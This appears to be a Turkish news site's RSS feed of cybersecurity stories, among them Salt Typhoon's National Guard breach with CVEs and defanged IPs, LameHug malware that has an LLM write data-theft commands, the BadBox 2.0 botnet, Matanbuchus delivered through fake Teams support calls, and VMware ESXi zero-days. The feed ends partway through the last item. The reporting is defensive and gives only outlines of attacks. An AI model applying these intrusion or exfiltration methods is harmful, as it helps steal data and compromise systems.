            <title>ABD Şokta! Salt Typhoon 9 Ay Boyunca Ağa Sızdı, Tüm Yapılandırmaları Ele Geçirdi</title>
            <link>https://cumha.com.tr/cinli-salt-typhoon-grubu-abd-ulusal-muhafiz-agina-sizarak-dokuz-ay-boyunca-ag-yapilandirmalarini-topladi</link>
            <guid>https://cumha.com.tr/cinli-salt-typhoon-grubu-abd-ulusal-muhafiz-agina-sizarak-dokuz-ay-boyunca-ag-yapilandirmalarini-topladi</guid>
            <description><![CDATA[ Çin devleti destekli Salt Typhoon adlı siber casusluk grubu, 2024 yılı boyunca ABD&#039;deki bir eyaletin Ulusal Muhafız ağına sızarak dokuz ay boyunca tespit edilmeden kaldı. Grup, yönetici kimlik bilgileri ve ağ şemaları da dahil olmak üzere kritik yapılandırma verilerini ele geçirdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_687a337209597.webp" length="29790" type="image/webp"/>
            
            <pubDate>Fri, 18 Jul 2025 13:09:38 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Salt Typhoon nasıl sızdı, hangi veriler ele geçirildi, saldırı diğer eyaletleri nasıl etkileyebilir, DHS hangi güvenlik açıkları konusunda uyarıyor, ABD Şokta! Salt Typhoon 9 Ay Boyunca Ağa Sızdı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p>ABD İç Güvenlik Bakanlığı’nın (DHS) 11 Haziran 2025 tarihli bir notuna göre,<span> </span><strong>Salt Typhoon</strong><span> </span>adlı Çin bağlantılı siber casusluk grubu,<span> </span><strong>2024 yılı Mart ile Aralık ayları arasında</strong><span> </span>bir ABD eyaletinin Ulusal Muhafız (Army National Guard) ağına sızdı. Saldırganların, söz konusu süre boyunca fark edilmeden sistemde kaldığı ve kritik veriler topladığı tespit edildi.</p>
<p><strong>Salt Typhoon</strong>, Çin Devlet Güvenlik Bakanlığı (MSS) ile bağlantılı olduğu düşünülen ve daha önce dünya genelinde telekom altyapılarına yönelik saldırılarla adını duyuran bir grup. Grup, AT&amp;T, Verizon, Viasat gibi birçok şirketi daha önce hedef almış ve ABD hükümetiyle bağlantılı haberleşme verilerine erişim sağlamayı amaçlamıştı.</p>
<p><strong>Ağ yapılandırmaları ve kimlik bilgileri ele geçirildi</strong><br>DHS’nin notuna göre, Salt Typhoon’un bu saldırıda elde ettiği veriler arasında:</p>
<ul>
<li>Ağ şemaları,</li>
<li>Yapılandırma dosyaları,</li>
<li>Sistem yöneticisi kimlik bilgileri,</li>
<li>Ulusal Muhafız personeline ait kişisel bilgiler yer alıyor.</li>
</ul>
<p>Bu bilgiler, yalnızca hedef alınan eyaletle sınırlı kalmadı. Ulusal Muhafız’ın diğer eyaletler ve en az dört ABD bölgesiyle olan veri trafiği de saldırganlar tarafından izlendi. Saldırganların, bu verileri kullanarak diğer eyalet ve federal ağlara da sızma amacı taşıdığı belirtiliyor.</p>
<p>DHS notunda, grubun daha önce benzer yapılandırma dosyalarını kullanarak başka devlet kurumlarında güvenlik açıklarını tespit ettiği ve yeni saldırılar gerçekleştirdiği bilgisi de yer aldı. Ocak–Mart 2024 döneminde ABD’de iki eyalet kurumundan daha benzer verilerin sızdırıldığı ifade edildi.</p>
<p><strong>Saldırganlar eski güvenlik açıklarını hedef aldı</strong><br>Saldırının nasıl gerçekleştiği belirtilmese de, Salt Typhoon’un daha önce şu güvenlik açıklarını istismar ettiği biliniyor:</p>
<ul>
<li><strong>CVE-2018-0171:</strong><span> </span>Cisco IOS Smart Install açığı</li>
<li><strong>CVE-2023-20198:</strong><span> </span>Cisco IOS XE web arayüzüne yetkisiz erişim sağlayan sıfır gün açığı</li>
<li><strong>CVE-2023-20273:</strong><span> </span>Cisco IOS XE’de ayrıcalık yükseltme zafiyeti</li>
<li><strong>CVE-2024-3400:</strong><span> </span>Palo Alto PAN-OS’ta komut enjeksiyonu açığı</li>
</ul>
<p>DHS, saldırılarda kullanılan bazı IP adreslerini de paylaştı:<br><code>43.254.132[.]118</code>,<span> </span><code>146.70.24[.]144</code>,<span> </span><code>176.111.218[.]190</code>,<span> </span><code>113.161.16[.]130</code>,<span> </span><code>23.146.242[.]131</code>,<span> </span><code>58.247.195[.]208</code></p>
<p>Grubun daha önce siyasi kampanyaları ve yasa koyucuları hedef alan telekom altyapılarına sızarak iletişimleri izlediği ve bu süreçte<span> </span><strong>JumblePath</strong><span> </span>ve<span> </span><strong>GhostSpider</strong><span> </span>adlı özel yazılımlar kullandığı da biliniyor.</p>
<p><strong>DHS’den önlem çağrısı</strong><br>İç Güvenlik Bakanlığı, federal ve eyalet düzeyindeki siber güvenlik ekiplerine şu önlemleri almaları çağrısında bulundu:</p>
<ul>
<li>İlgili açıkların kapatılması,</li>
<li>Gereksiz servislerin devre dışı bırakılması,</li>
<li>SMB trafiğinin segmentasyonu,</li>
<li>SMB imzalamanın zorunlu kılınması,</li>
<li>Erişim kontrollerinin sıkılaştırılması.</li>
</ul>
<p>Ulusal Muhafız Bürosu, ihlali doğruladı ancak hangi eyaletin etkilendiği veya olayın operasyonlara etkisi hakkında ayrıntı paylaşmadı. Çin’in Washington Büyükelçiliği ise saldırıyı doğrudan reddetmedi ancak Salt Typhoon’un Çin devletiyle bağlantılı olduğuna dair “kesin ve güvenilir bir kanıt” sunulmadığını savundu.</p>
<p>Kaynak: CUMHA - CUMHUR HABER AJANSI</p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>BigONE kripto para borsası saldırıya uğradı, sıcak cüzdandan 27 milyon dolar çalındı</title>
            <link>https://cumha.com.tr/bigone-kripto-para-borsasi-saldiriya-ugradi-sicak-cuzdandan-27-milyon-dolar-calindi</link>
            <guid>https://cumha.com.tr/bigone-kripto-para-borsasi-saldiriya-ugradi-sicak-cuzdandan-27-milyon-dolar-calindi</guid>
            <description><![CDATA[ Kripto para borsası BigONE, 16 Temmuz’da gerçekleşen siber saldırıda sıcak cüzdanlarının hedef alındığını ve toplamda 27 milyon dolar değerinde dijital varlığın çalındığını açıkladı. Şirket, kullanıcı varlıklarının etkilenmediğini ve zararların rezerflerden karşılanacağını duyurdu. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_687a3402ef504.webp" length="58622" type="image/webp"/>
            
            <pubDate>Fri, 18 Jul 2025 13:09:36 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Saldırganlar BigONEa nasıl sızdı, çalınan kripto paralar nasıl dönüştürüldü, kullanıcılar zarar görecek mi, 2025te kripto hırsızlıkları neden arttı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="428" data-end="724">Kripto para borsası <strong data-start="448" data-end="458">BigONE</strong>, 16 Temmuz 2025’te gerçekleşen bir siber saldırı sonucu yaklaşık <strong data-start="524" data-end="543">27 milyon dolar</strong> değerinde dijital varlığın çalındığını duyurdu. Şirket tarafından yapılan açıklamada, kullanıcıların kişisel verileri ve özel anahtarlarının bu saldırıdan etkilenmediği belirtildi.</p>
<p data-start="726" data-end="1015">BigONE, saldırının erken saatlerinde platform üzerindeki bazı varlıklarda olağandışı hareketler tespit edildiğini ve yapılan inceleme sonucunda bunun üçüncü taraf kaynaklı bir saldırı olduğunun belirlendiğini bildirdi. Saldırıdan yalnızca <strong data-start="965" data-end="981">sıcak cüzdan</strong> sisteminin etkilendiği açıklandı.</p>
<p data-start="1017" data-end="1301"><strong data-start="1017" data-end="1054">Zarar kullanıcıya yansıtılmayacak</strong><br data-start="1054" data-end="1057">Şirket, yaşanan kaybın platform rezervlerinden karşılanacağını ve hiçbir kullanıcının zarar görmeyeceğini belirtti:<br data-start="1172" data-end="1175">“BigONE, bu olaydan doğan tüm kayıpları tamamen karşılayacaktır. Kullanıcı varlıkları üzerinde maddi bir etki oluşmayacaktır.”</p>
<p data-start="1303" data-end="1627"><strong data-start="1303" data-end="1341">Tedarik zinciri saldırısı ihtimali</strong><br data-start="1341" data-end="1344">Siber güvenlik firması <strong data-start="1367" data-end="1379">SlowMist</strong> ile iş birliği yapan BigONE, saldırının izini blockchain üzerinde sürmeye başladığını duyurdu. Ancak saldırının teknik detayları henüz kamuoyuyla paylaşılmadı. SlowMist yetkilileri, olayın bir <strong data-start="1573" data-end="1602">tedarik zinciri saldırısı</strong> olabileceğini öne sürdü.</p>
<p data-start="1629" data-end="1832">Blockchain analiz platformu <strong data-start="1657" data-end="1672">Lookonchain</strong>, saldırganların çalınan dijital varlıkları hızla dönüştürdüğünü ve bunların 120 Bitcoin, 1.272 Ether, 2.625 Solana ve 23,3 milyon Tron'a çevrildiğini bildirdi.</p>
<p data-start="1834" data-end="2175"><strong data-start="1834" data-end="1866">Sektörel etkiler ve yorumlar</strong><br data-start="1866" data-end="1869">Blockchain suç araştırmacısı <strong data-start="1898" data-end="1909">ZachXBT</strong>, olayla ilgili yaptığı değerlendirmede, BigONE’un geçmişte dolandırıcılık kaynaklı kripto paraların işlendiği bir platform olarak da bilindiğine dikkat çekerek, bu tür saldırıların kripto ekosisteminde doğal bir “temizlenme” sürecini tetikleyebileceğini ifade etti.</p>
<p data-start="2177" data-end="2510"><strong data-start="2177" data-end="2221">2025’te kripto hırsızlıkları rekor kırdı</strong><br data-start="2221" data-end="2224">Olay, kripto sektöründe yaşanan genel artışın ortasında gerçekleşti. <strong data-start="2293" data-end="2308">Chainalysis</strong> tarafından yayımlanan 2025 yıl ortası raporuna göre, bu yıl şimdiye kadar <strong data-start="2383" data-end="2421">2,17 milyar dolarlık kripto varlık</strong> çalındı. Bu rakam, 2024 yılının tamamında gerçekleşen kayıpların üzerine çıkmış durumda.</p>
<p data-start="2512" data-end="2794">Raporda, Kuzey Kore bağlantılı aktörlerin <strong data-start="2554" data-end="2563">ByBit</strong> borsasından yapılan 1,5 milyar dolarlık saldırıyla bu yılın en büyük faillerinden biri haline geldiği vurgulandı. Ayrıca kişisel cüzdanlara yönelik saldırıların da artışta olduğu ve toplam kaybın %23,35’ini oluşturduğu belirtildi.</p>
<p data-start="2796" data-end="2961">Chainalysis ayrıca kripto hırsızlıklarında <strong data-start="2839" data-end="2883">fiziksel şiddet olaylarının da arttığını</strong> ve bunun Bitcoin fiyatlarındaki yükselişle bağlantılı olabileceğini bildirdi.</p>
<p data-start="2968" data-end="3134"><strong data-start="2968" data-end="2980"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Yeni LameHug zararlısı, Windows sistemlerde veri hırsızlığı için yapay zekâ destekli komutlar üretiyor</title>
            <link>https://cumha.com.tr/yeni-lamehug-zararlisi-windows-sistemlerde-veri-hirsizligi-icin-yapay-zeka-destekli-komutlar-uretiyor</link>
            <guid>https://cumha.com.tr/yeni-lamehug-zararlisi-windows-sistemlerde-veri-hirsizligi-icin-yapay-zeka-destekli-komutlar-uretiyor</guid>
            <description><![CDATA[ Ukrayna&#039;nın siber olay müdahale ekibi CERT-UA tarafından tespit edilen LameHug adlı zararlı yazılım, yapay zekâ modeli Qwen 2.5-Coder aracılığıyla gerçek zamanlı olarak komut üreterek Windows sistemlerde veri topluyor. Zararlı yazılımın Rusya bağlantılı APT28 grubu tarafından kullanıldığı belirtiliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_687a347fc2a1f.webp" length="49626" type="image/webp"/>
            
            <pubDate>Fri, 18 Jul 2025 13:09:34 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>LameHug nasıl çalışıyor, yapay zekâ bu saldırılarda nasıl kullanılıyor, saldırıdan kimler sorumlu tutuluyor, bu yöntem güvenlik yazılımlarını nasıl atlatıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="467" data-end="843">Ukrayna Ulusal Siber Olay Müdahale Ekibi (CERT-UA), yapay zekâ destekli komutlar kullanarak Windows sistemlerinde veri hırsızlığı gerçekleştiren yeni bir zararlı yazılım ailesi olan <strong data-start="649" data-end="660">LameHug</strong>’u keşfetti. Python ile yazılan zararlı yazılım, <strong data-start="709" data-end="778">Alibaba Cloud tarafından geliştirilen Qwen 2.5-Coder-32B-Instruct</strong> adlı açık kaynaklı büyük dil modeli (LLM) ile entegre çalışıyor.</p>
<p data-start="845" data-end="1286">CERT-UA, 10 Temmuz 2025 tarihinde hükümet kurumlarına gönderilen sahte e-postalar üzerinden yürütülen saldırılar hakkında aldığı ihbarlar sonrasında LameHug’u tespit etti. Saldırılarda, Ukrayna hükümet yetkilileri gibi davranan saldırganlar, hedeflere zararlı yazılım içeren ZIP dosyaları gönderdi. Bu eklentiler arasında “<strong data-start="1168" data-end="1186">Attachment.pif</strong>”, “<strong data-start="1190" data-end="1237">AI_generator_uncensored_Canvas_PRO_v0.9.exe</strong>” ve “<strong data-start="1243" data-end="1255">image.py</strong>” isimli yükleyiciler yer aldı.</p>
<p data-start="1288" data-end="1638"><strong data-start="1288" data-end="1336">Komutlar yapay zekâ tarafından oluşturuluyor</strong><br data-start="1336" data-end="1339">LameHug’un en dikkat çekici özelliği, sabit kodlu komutlar yerine, Hugging Face platformu aracılığıyla LLM modeli kullanarak <strong data-start="1464" data-end="1530">dinamik olarak sistem keşif ve veri toplama komutları üretmesi</strong>. Yapay zekâya gönderilen doğal dil girdileri sonucunda elde edilen komutlar, hedef sistemde çalıştırılarak:</p>
<ul data-start="1640" data-end="1879">
<li data-start="1640" data-end="1700">
<p data-start="1642" data-end="1700">Sistem bilgileri <code data-start="1659" data-end="1669">info.txt</code> adlı bir dosyada toplanıyor,</p>
</li>
<li data-start="1701" data-end="1794">
<p data-start="1703" data-end="1794">Kullanıcının “Documents”, “Desktop” ve “Downloads” klasörlerinde belge araması yapılıyor,</p>
</li>
<li data-start="1795" data-end="1879">
<p data-start="1797" data-end="1879">Elde edilen veriler <strong data-start="1817" data-end="1825">SFTP</strong> veya <strong data-start="1831" data-end="1844">HTTP POST</strong> yoluyla dış sunuculara iletiliyor.</p>
</li>
</ul>
<p data-start="1881" data-end="2101">Bu yöntem, zararlı yazılımın yeni komutlar veya güncellemeler almadan saldırı senaryolarını olay anında değiştirebilmesini sağlıyor. Aynı zamanda sabit komutları arayan antivirüs çözümlerini atlatmayı da kolaylaştırıyor.</p>
<p data-start="2103" data-end="2389"><strong data-start="2103" data-end="2141">Saldırılar APT28 grubuna atfedildi</strong><br data-start="2141" data-end="2144">CERT-UA, bu faaliyetleri <strong data-start="2169" data-end="2200">Rusya devlet destekli APT28</strong> grubu ile <strong data-start="2211" data-end="2242">orta düzeyde güvenilirlikle</strong> ilişkilendiriyor. APT28, daha önce Sednit, Fancy Bear, STRONTIUM ve Pawn Storm gibi isimlerle de bilinen köklü bir tehdit aktörü olarak tanınıyor.</p>
<p data-start="2391" data-end="2796"><strong data-start="2391" data-end="2438">Yeni bir siber saldırı paradigması olabilir</strong><br data-start="2438" data-end="2441">LameHug, kamuya açık olarak belgelenmiş ilk <strong data-start="2485" data-end="2517">LLM destekli zararlı yazılım</strong> olma özelliğini taşıyor. Uzmanlara göre bu tür saldırılar, tehdit aktörlerinin daha esnek, dinamik ve tespit edilmesi zor siber operasyonlar yürütmesine imkân tanıyor. Ayrıca Hugging Face gibi meşru altyapılar kullanılarak komut ve kontrol iletişimi daha gizli hale getiriliyor.</p>
<p data-start="2798" data-end="2941">CERT-UA, yapay zekâ modeli tarafından oluşturulan komutların sistemde başarıyla çalıştırılıp çalıştırılamadığına dair net bir bilgi paylaşmadı.</p>
<p data-start="2948" data-end="3122"><strong data-start="2948" data-end="2960"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Google, 10 milyon cihazı etkileyen BadBox 2.0 botnet ağına karşı dava açtı</title>
            <link>https://cumha.com.tr/google-10-milyon-cihazi-etkileyen-badbox-20-botnet-agina-karsi-dava-acti</link>
            <guid>https://cumha.com.tr/google-10-milyon-cihazi-etkileyen-badbox-20-botnet-agina-karsi-dava-acti</guid>
            <description><![CDATA[ Google, Android cihazları hedef alan ve reklam dolandırıcılığı üzerinden gelir elde eden BadBox 2.0 adlı zararlı yazılım ağını durdurmak için ABD&#039;de dava açtı. Şirket, Çin bağlantılı olduğu düşünülen isimsiz failleri RICO ve Bilişim Suçları Yasası kapsamında suçluyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_687a35ffd325b.webp" length="61890" type="image/webp"/>
            
            <pubDate>Fri, 18 Jul 2025 13:09:33 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>BadBox 2.0 nasıl yayılıyor, reklam dolandırıcılığı nasıl işliyor, Google bu saldırılara nasıl yanıt verdi, davada hangi yasalar uygulanıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="404" data-end="675">Google, dünya çapında 10 milyondan fazla Android cihazı etkileyen <strong data-start="470" data-end="484">BadBox 2.0</strong> botnet operasyonunu durdurmak amacıyla ABD'de dava açtı. Şirket, failleri belirlenemeyen siber suçluları, reklam platformlarına yönelik organize dolandırıcılık faaliyeti yürütmekle suçluyor.</p>
<p data-start="677" data-end="1088">BadBox 2.0, Android Open Source Project (AOSP) tabanlı cihazlarda çalışan bir zararlı yazılım ağı. Saldırganlar, düşük maliyetli AOSP cihazları (akıllı TV’ler, medya kutuları, vb.) satın alarak işletim sistemini değiştiriyor ve <strong data-start="905" data-end="968">BadBox 2.0 zararlısını yüklü şekilde yeniden satışa sunuyor</strong>. Ayrıca kullanıcılar, zararlı yazılım içeren uygulamaları indirerek de farkında olmadan cihazlarını enfekte edebiliyor.</p>
<p data-start="1090" data-end="1421">Zararlı yazılım, cihazlara kurulduktan sonra saldırganların kontrolündeki komut sunucularına (C2) bağlanıyor ve verilen komutları çalıştırarak cihazı bir botnete dahil ediyor. Enfekte cihazlar ya <strong data-start="1286" data-end="1348">siber suçlulara vekil internet erişimi (residential proxy)</strong> olarak satılıyor ya da <strong data-start="1372" data-end="1398">reklam dolandırıcılığı</strong> amacıyla kullanılıyor.</p>
<p data-start="1423" data-end="1475"><strong data-start="1423" data-end="1473">Reklam dolandırıcılığı üç aşamalı yürütülüyor:</strong></p>
<ol data-start="1476" data-end="1940">
<li data-start="1476" data-end="1609">
<p data-start="1479" data-end="1609"><strong data-start="1479" data-end="1508">Gizli reklam görüntüleme:</strong> Kötü niyetli kopya uygulamalar (evil twin apps) arka planda sessizce Google reklamlarını yüklüyor.</p>
</li>
<li data-start="1610" data-end="1771">
<p data-start="1613" data-end="1771"><strong data-start="1613" data-end="1650">Web tabanlı oyun dolandırıcılığı:</strong> Cihazlar, görünmeyen tarayıcılar üzerinden otomatik olarak oyun sitelerini çalıştırıp reklam gösterimlerini artırıyor.</p>
</li>
<li data-start="1772" data-end="1940">
<p data-start="1775" data-end="1940"><strong data-start="1775" data-end="1809">Arama tıklama dolandırıcılığı:</strong> Cihazlar, reklam içeren sahte arama sonuçlarını tetikleyerek tıklama başına gelir elde eden yayıncı hesaplarına para kazandırıyor.</p>
</li>
</ol>
<p data-start="1942" data-end="2178">Google, <strong data-start="1950" data-end="2016">New York eyaletinde 170.000'den fazla cihazın enfekte olduğunu</strong> ve platformlarına bağlı <strong data-start="2041" data-end="2096">binlerce yayıncı hesabının devre dışı bırakıldığını</strong> açıkladı. Ancak şirket, ağın halen aktif olduğunu ve hızla büyüdüğünü belirtiyor.</p>
<p data-start="2180" data-end="2621">Google’ın mahkemeye sunduğu şikayette, botnetin <strong data-start="2228" data-end="2333">2024 sonunda Almanya'nın DNS sorgularını sinkhole yöntemiyle keserek orijinal BadBox ağını durdurduğu</strong> ancak saldırganların bu engeli aşarak <strong data-start="2372" data-end="2412">BadBox 2.0 sürümünü yayına aldıkları</strong> ifade ediliyor. Şirket, bu ağın durdurulmazsa daha fazla cihaza bulaşarak yeni zararlı yazılımlar üretmeye devam edeceğini ve kendilerinin her yıl büyük miktarda kaynak harcamak zorunda kalacağını belirtiyor.</p>
<p data-start="2623" data-end="2968"><strong data-start="2623" data-end="2655">RICO ve CFAA kapsamında dava</strong><br data-start="2655" data-end="2658">Google, faillerin Çin'de ikamet ettiğini düşündüğü için kimlikleri tespit edilemeyen bu kişilere karşı <strong data-start="2761" data-end="2798">ABD Bilişim Suçları Yasası (CFAA)</strong> ve <strong data-start="2802" data-end="2846">Organize Suçlarla Mücadele Yasası (RICO)</strong> kapsamında dava açtı. Şirket, zararın tazmini ve botnet altyapısının kalıcı olarak devre dışı bırakılmasını talep ediyor.</p>
<p data-start="2970" data-end="3076">Dava dosyasında, siber suç operasyonuna ait olduğu tespit edilen <strong data-start="3035" data-end="3061">100’den fazla alan adı</strong> da yer alıyor.</p>
<p data-start="3083" data-end="3239"><strong data-start="3083" data-end="3095"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Microsoft Teams üzerinden sahte yardım masası aramalarıyla Matanbuchus zararlısı yayılıyor</title>
            <link>https://cumha.com.tr/microsoft-teams-uzerinden-sahte-yardim-masasi-aramalariyla-matanbuchus-zararlisi-yayiliyor</link>
            <guid>https://cumha.com.tr/microsoft-teams-uzerinden-sahte-yardim-masasi-aramalariyla-matanbuchus-zararlisi-yayiliyor</guid>
            <description><![CDATA[ Matanbuchus zararlısı, Microsoft Teams üzerinden yapılan sosyal mühendislik saldırılarıyla dağıtılmaya başlandı. Saldırganlar, BT destek personeli kılığına girerek hedeflerin cihazlarına uzaktan erişim sağlıyor ve zararlı yazılımı sistem belleğinde gizlice çalıştırıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_687a329317e55.webp" length="33292" type="image/webp"/>
            
            <pubDate>Fri, 18 Jul 2025 13:09:31 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Matanbuchus nasıl çalışıyor, saldırganlar Microsoft Teamsi nasıl kullanıyor, Matanbuchus 3.0 ne gibi yenilikler içeriyor, sistem yöneticileri hangi önlemleri almalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="422" data-end="719">Microsoft Teams platformu, son dönemde Matanbuchus adlı zararlı yazılımın dağıtımı için sosyal mühendislik saldırılarında kullanılmaya başlandı. Zararlı yazılım, sahte BT destek personeli gibi davranan saldırganlar tarafından yapılan Teams sesli aramaları aracılığıyla hedef sistemlere yükleniyor.</p>
<p data-start="721" data-end="1138">Matanbuchus, ilk olarak 2021 yılında karanlık ağda tanıtılan bir <strong data-start="786" data-end="817">malware-as-a-service (MaaS)</strong> hizmeti olarak dikkat çekmişti. Windows sistemlerinde çalışan bu zararlı yazılım, yüklediği kötü amaçlı bileşenleri doğrudan bellekte çalıştırarak antivirüs yazılımlarının tespitinden kaçabiliyor. Yazılım, daha önce 2022 yılında büyük çaplı bir spam kampanyasında Cobalt Strike bileşenlerini dağıtmak için kullanılmıştı.</p>
<p data-start="1140" data-end="1570"><strong data-start="1140" data-end="1186">Sahte BT çağrılarıyla sistemlere sızılıyor</strong><br data-start="1186" data-end="1189">Morphisec adlı güvenlik firmasına göre, Matanbuchus'un yeni sürümü olan 3.0 versiyonunda Microsoft Teams üzerinden saldırılar daha yaygın hale geldi. Saldırganlar, hedef kullanıcıya harici bir Teams çağrısı başlatarak kendilerini BT destek personeli gibi tanıtıyor. Ardından, hedef kullanıcıdan Windows’un yerleşik uzaktan yardım aracı olan <strong data-start="1530" data-end="1546">Quick Assist</strong>’i başlatması isteniyor.</p>
<p data-start="1572" data-end="1821">Quick Assist üzerinden erişim sağlandıktan sonra kullanıcıdan bir PowerShell komutu çalıştırması isteniyor. Bu komut, üç dosya içeren bir ZIP arşivini indirip çıkararak, <strong data-start="1742" data-end="1762">DLL side-loading</strong> yöntemiyle Matanbuchus zararlısının yüklenmesini sağlıyor.</p>
<p data-start="1823" data-end="2158"><strong data-start="1823" data-end="1855">Gelişmiş gizlenme yöntemleri</strong><br data-start="1855" data-end="1858">Matanbuchus 3.0 sürümü, önceki versiyonlara kıyasla daha gelişmiş gizlenme ve tespit önleme özellikleri içeriyor. Komut ve kontrol iletişimi RC4 yerine <strong data-start="2010" data-end="2021">Salsa20</strong> algoritmasıyla sağlanıyor. Zararlı yazılım, yalnızca belirli bölge ve sistemlerde çalışmak üzere <strong data-start="2119" data-end="2135">anti-sandbox</strong> kontrolleri uyguluyor.</p>
<p data-start="2160" data-end="2401">Windows API çağrıları yerine doğrudan <strong data-start="2198" data-end="2209">syscall</strong>’lar aracılığıyla işlem yapan zararlı, güvenlik yazılımlarını atlatmayı hedefliyor. Bu işlemler, analizden kaçmak için <strong data-start="2328" data-end="2343">MurmurHash3</strong> adlı non-kriptografik özetleme algoritmasıyla gizleniyor.</p>
<p data-start="2403" data-end="2662">Zararlı yazılımın sistemde çalıştıktan sonraki yetenekleri arasında, PowerShell, CMD, EXE, DLL, MSI ve shellcode dosyalarını çalıştırabilme, kullanıcı bilgilerini toplama ve güvenlik yazılımlarını tespit ederek saldırı yöntemini buna göre ayarlama yer alıyor.</p>
<p data-start="2664" data-end="2942"><strong data-start="2664" data-end="2694">Tehdit analizi ve uyarılar</strong><br data-start="2694" data-end="2697">Morphisec tarafından yapılan teknik analizde, Matanbuchus’un önemli ölçüde gelişmiş bir tehdit haline geldiği belirtiliyor. Şirket, zararlı yazılım örnekleri ve kullanıldığı alan adlarını içeren istismar göstergelerini (IOC) kamuoyuyla paylaştı.</p>
<p data-start="2944" data-end="3259">Geçmişte de DarkGate zararlısının Microsoft Teams üzerinden benzer yollarla dağıtıldığı ve dış erişim ayarları zayıf olan kuruluşların hedef alındığı biliniyor. Microsoft Teams’in sosyal mühendislik saldırılarında kullanımının artması, özellikle dış kaynaklı erişim ayarlarının gözden geçirilmesini gerekli kılıyor.</p>
<p data-start="3266" data-end="3448"><strong data-start="3266" data-end="3278"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>VMware, Pwn2Own Berlin'de sıfır gün açıklarıyla istismar edilen dört kritik ESXi güvenlik açığını yamaladı</title>
            <link>https://cumha.com.tr/vmware-pwn2own-berlinde-sifir-gun-aciklariyla-istismar-edilen-doert-kritik-esxi-guvenlik-acigini-yamaladi</link>
            <guid>https://cumha.com.tr/vmware-pwn2own-berlinde-sifir-gun-aciklariyla-istismar-edilen-doert-kritik-esxi-guvenlik-acigini-yamaladi</guid>
            <description><![CDATA[ Pwn2Own Berlin 2025 etkinliğinde güvenlik araştırmacıları tarafından istismar edilen ve VMware ESXi, Workstation, Fusion ve Tools ürünlerini etkileyen dört sıfır gün açığı için şirket güncellemeler yayımladı. Açıklardan üçü 9.3 şiddet derecesine sahip ve sanal makinelerden ana sisteme kod çalıştırılmasına olanak tanıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_687a32481156e.webp" length="59020" type="image/webp"/>
            
            <pubDate>Fri, 18 Jul 2025 13:09:28 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Hangi VMware ürünleri etkilendi, açıklar nasıl istismar edildi, güncelleme dışında çözüm var mı, Pwn2Own Berlinde hangi ödüller verildi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="490" data-end="730">VMware, sanallaştırma ürünlerini etkileyen ve Pwn2Own Berlin 2025 yarışmasında istismar edilen dört sıfır gün açığına yönelik güvenlik güncellemeleri yayımladı. Güncellemeler VMware ESXi, Workstation, Fusion ve Tools yazılımlarını kapsıyor.</p>
<p data-start="732" data-end="926">Söz konusu açıkların üçü, saldırganların sanal makineden ana sisteme geçerek komut çalıştırmasına olanak tanıyan yüksek önemdeki zafiyetler olarak tanımlanıyor. Bu açıklar şu şekilde listelendi:</p>
<ul data-start="928" data-end="1483">
<li data-start="928" data-end="1081">
<p data-start="930" data-end="1081"><strong data-start="930" data-end="949">CVE-2025-41236:</strong> VMXNET3 sanal ağ adaptöründe bulunan tamsayı taşması açığı. Bu zafiyet, STARLabs SG’den Nguyen Hoang Thach tarafından kullanıldı.</p>
</li>
<li data-start="1082" data-end="1295">
<p data-start="1084" data-end="1295"><strong data-start="1084" data-end="1103">CVE-2025-41237:</strong> VMCI (Virtual Machine Communication Interface) bileşeninde tamsayı alt taşması sonucu oluşan out-of-bounds yazma hatası. Açık, REverse Tactics’ten Corentin Bayet tarafından istismar edildi.</p>
</li>
<li data-start="1296" data-end="1483">
<p data-start="1298" data-end="1483"><strong data-start="1298" data-end="1317">CVE-2025-41238:</strong> PVSCSI (Paravirtualized SCSI) kontrolcüsünde bulunan heap overflow zafiyeti. Bu açık, Synacktiv’ten Thomas Bouzerar ve Etienne Helluy-Lafont tarafından kullanıldı.</p>
</li>
</ul>
<p data-start="1485" data-end="1533">Bu üç zafiyetin her biri 9.3 CVSS puanına sahip.</p>
<p data-start="1535" data-end="1803"><strong data-start="1535" data-end="1572">Bilgi sızdırma açığı da kapatıldı</strong><br data-start="1572" data-end="1575">Dördüncü açık olan <strong data-start="1594" data-end="1612">CVE-2025-41239</strong>, bilgi sızdırılmasına neden olabilecek bir zafiyet olarak tanımlandı ve 7.1 şiddet puanı aldı. Bu açık da Corentin Bayet tarafından tespit edildi ve CVE-2025-41237 ile zincirleme kullanıldı.</p>
